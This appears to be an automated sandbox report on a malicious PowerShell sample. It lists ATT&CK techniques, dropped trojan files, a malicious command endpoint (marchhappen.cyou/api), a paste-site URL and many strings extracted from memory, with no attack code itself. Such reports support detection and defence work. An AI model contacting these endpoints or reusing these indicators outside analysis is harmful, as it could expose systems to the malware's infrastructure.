                    Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara match File source: sslproxydump.pcap, type: PCAP
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Windows Management Instrumentation
                    11
                    DLL Side-Loading
                    1
                    Abuse Elevation Control Mechanism
                    11
                    Deobfuscate/Decode Files or Information
                    1
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services12
                    Archive Collected Data
                    1
                    Web Service
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API
                    1
                    Registry Run Keys / Startup Folder
                    11
                    DLL Side-Loading
                    1
                    Abuse Elevation Control Mechanism
                    LSASS Memory12
                    File and Directory Discovery
                    Remote Desktop Protocol21
                    Data from Local System
                    3
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    PowerShell
                    Logon Script (Windows)212
                    Process Injection
                    4
                    Obfuscated Files or Information
                    Security Account Manager134
                    System Information Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive11
                    Encrypted Channel
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Registry Run Keys / Startup Folder
                    11
                    Software Packing
                    NTDS431
                    Security Software Discovery
                    Distributed Component Object ModelInput Capture4
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp
                    LSA Secrets2
                    Process Discovery
                    SSHKeylogging115
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    DLL Side-Loading
                    Cached Domain Credentials221
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    Masquerading
                    DCSync1
                    Application Window Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job221
                    Virtualization/Sandbox Evasion
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                    Process Injection
                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Behavior Graph (image not reproduced): ID: 1562214, Sample: IaslcsMo.ps1, Startdate: 25/11/2024, Architecture: WINDOWS, Score: 100

                    Source | Detection | Scanner | Label | Link
                    IaslcsMo.ps1 | 0% | ReversingLabs | |

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Local\Temp\wpkoqtsrt | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\yhg | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\wpkoqtsrt | 62% | ReversingLabs | Win32.Trojan.MintZard |
                    C:\Users\user\AppData\Local\Temp\yhg | 62% | ReversingLabs | Win32.Trojan.MintZard |
                    C:\Users\user\AppData\Roaming\UPEC\QtCore4.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\UPEC\QtGui4.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\UPEC\QtNetwork4.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\UPEC\QtXml4.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\UPEC\StarBurn.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\UPEC\msvcp100.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\UPEC\msvcr100.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\VWPGdipf\Data\Updater.exe | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\VWPGdipf\Data\d3dcompiler_47.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\VWPGdipf\Data\ffmpeg.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\VWPGdipf\NAudio.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\VWPGdipf\QtCore4.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\VWPGdipf\QtGui4.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\VWPGdipf\QtNetwork4.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\VWPGdipf\QtXml4.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\VWPGdipf\RcClientBase.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\VWPGdipf\Resource.ct | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe | 3% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\VWPGdipf\StarBurn.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\VWPGdipf\UpdateClient.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\VWPGdipf\UpdateCommon.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\VWPGdipf\msvcp100.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\VWPGdipf\msvcr100.dll | 0% | ReversingLabs | |
                    No Antivirus matches
                    No Antivirus matches
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    rentry.co | 172.67.75.40 | true | false | | high
                    marchhappen.cyou | 104.21.2.224 | true | true | | unknown

                    Name | Malicious | Antivirus Detection | Reputation
                    https://marchhappen.cyou/api | true | Avira URL Cloud: malware | unknown
                    https://rentry.co/feouewe5/raw | false | | high
                    marchhappen.cyou | true | Avira URL Cloud: safe | unknown
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://isecure-a.reneelab.com/webapi.php?code=Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://subca.ocsp-certum.com02powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0DSet-up.exe, 00000005.00000002.2017343789.000000006BD29000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2154481527.000000006BD29000.00000002.00000001.01000000.0000000D.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://grub4dos.chenall.net/e/%u)Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://subca.ocsp-certum.com01powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://crl.certum.pl/ctnca2.crl0lpowershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://repository.certum.pl/ctnca2.cer09powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?acSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.reneelab.es/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.reneelab.de/product-land-237.htmlhttp://support.reneelab.com/anonymous_requests/newstore/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.trialpay.com/productpage/?c=3016dc6&tid=6rpipboSet-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.reneelab.comSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1934473378.0000018E524D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.reneelab.com/product-land-188.htmlhttp://support.reneelab.com/anonymous_requests/newstoreSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.certum.pl/CPS0powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://bugreports.qt-project.org/Set-up.exe, 00000005.00000002.2017343789.000000006BD29000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2154481527.000000006BD29000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.reneelab.com.cn/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.reneelab.pl/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://trolltech.com/xml/features/report-whitespace-only-CharDatahttp://xml.org/sax/features/namespaSet-up.exe, 00000005.00000002.2038064529.000000006F009000.00000002.00000001.01000000.0000000E.sdmp, Set-up.exe, 00000008.00000002.2170156520.000000006F009000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.phreedom.org/md5)Set-up.exe, 00000005.00000002.2017343789.000000006BD29000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2154481527.000000006BD29000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                    high
                                                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000000.00000002.1934473378.0000018E526F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://repository.certum.pl/ctnca.cer09powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.reneelab.es/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newstore/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.reneelab.comwww.reneelab.comhttp://https://0Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003UserSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1934473378.0000018E526F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.1934473378.0000018E526F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.certum.pl/ctnca.crl0kpowershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1934473378.0000018E526F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.reneelab.kr/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.reneelab.jp/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://xml.org/sax/features/namespacesSet-up.exe, 00000005.00000002.2038064529.000000006F009000.00000002.00000001.01000000.0000000E.sdmp, Set-up.exe, 00000008.00000002.2170156520.000000006F009000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                                  high
                                                                  http://isecure.reneelab.com.cn/webapi.php?code=Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.winimage.com/zLibDll1.2.6Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.vmware.com/0/Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://downloads.reneelab.com/passnow/passnow_Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.reneelab.net/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.certum.pl/CPS0powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://qt.digia.com/product/licensingSet-up.exe, 00000008.00000002.2161780433.000000006C32E000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://c0rl.m%LSet-up.exe, 00000005.00000002.2015583139.00000000035E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://trolltech.com/xml/features/report-start-end-entityUnknownSet-up.exe, 00000005.00000002.2038064529.000000006F009000.00000002.00000001.01000000.0000000E.sdmp, Set-up.exe, 00000008.00000002.2170156520.000000006F009000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.reneelab.net//reset-windows-password.htmlhttp://support.reneelab.com/anonymous_requests/nSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.symauth.com/cps0(Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1934473378.0000018E526F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.reneelab.com.cn/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.reneelab.it/reimpostare-passwordi-di-windows-login.htmlSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://isecure.reneelab.com.cn/webapi.php?code=http://isecure-a.reneelab.com/webapi.php?code=http://Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.symauth.com/rpa00Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.1934473378.0000018E526F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.info-zip.org/Set-up.exe, 00000005.00000002.2015698096.00000000036B0000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000004FFA000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://trolltech.com/xml/features/report-start-end-entitySet-up.exe, 00000005.00000002.2038064529.000000006F009000.00000002.00000001.01000000.0000000E.sdmp, Set-up.exe, 00000008.00000002.2170156520.000000006F009000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                                                    high
                                                                                    http://www.winimage.com/zLibDllSet-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                      high
                                                                                      http://www.reneelab.com/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://isecure.reneelab.com/webapi.php?code=Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://aka.ms/pscore68powershell.exe, 00000000.00000002.1934473378.0000018E524D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()Set-up.exe, 00000005.00000002.2017343789.000000006BD29000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2154481527.000000006BD29000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.reneelab.jp/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstore/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://trolltech.com/xml/features/report-whitespace-only-CharDataSet-up.exe, 00000005.00000002.2038064529.000000006F009000.00000002.00000001.01000000.0000000E.sdmp, Set-up.exe, 00000008.00000002.2170156520.000000006F009000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                                                          high
                                                                                          https://downloads.reneelab.com.cn/passnow/passnow_Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://www.reneelab.biz/redefinir-senha-de-admin-logon-windows.htmlhttp://support.reneelab.com/anonySet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurchaSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          IP | Domain | Country | ASN | ASN Name | Malicious
                                                                                          104.21.2.224 | marchhappen.cyou | United States | 13335 | CLOUDFLARENETUS | true
                                                                                          172.67.75.40 | rentry.co | United States | 13335 | CLOUDFLARENETUS | false
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1562214
                                                                                          Start date and time:2024-11-25 10:52:50 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 10m 58s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:17
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:IaslcsMo.ps1
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.expl.evad.winPS1@19/224@2/2
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 4
                                                                                          • Number of non-executed functions: 460
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .ps1
                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
